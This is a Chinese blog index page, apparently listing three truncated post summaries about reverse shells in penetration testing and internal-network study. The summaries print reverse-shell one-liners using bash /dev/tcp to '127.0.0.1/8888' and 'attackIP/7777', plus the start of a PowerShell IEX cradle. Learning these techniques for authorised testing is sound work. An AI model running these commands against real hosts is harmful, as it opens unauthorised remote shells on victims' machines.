摘要:
测试时, 首先需要对网站基本信息有一个收集, 要知道它是什么系统, linux与windows反弹shell的命令不同 linux(需要编码处理): bash -i >& /dev/tcp/127.0.0.1/8888 0>&1 windwos(不需要编码处理): powershell IEX (N 阅读全文
posted @ 2021-06-11 23:04
H4ck3rX
阅读(77)
评论(0)
推荐(0)
摘要:
参考文章# 反弹shell的各种姿势powershell反弹shell常见方式 前言# 最近在学内网,就从最基础的知识开始学习、整理 正向连接# 攻击者去连接受害者弊端:当受害者处于局域网内无法使用正向连接;当受害者 IP 实时变化时无法持续连接。 反向连接# 受害者主动连接攻击者 前提# 为什么要 阅读全文
posted @ 2021-06-11 22:04
H4ck3rX
阅读(542)
评论(0)
推荐(0)
摘要:
方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp/atta 阅读全文
posted @ 2021-06-11 22:02
H4ck3rX
阅读(122)
评论(0)
推荐(0)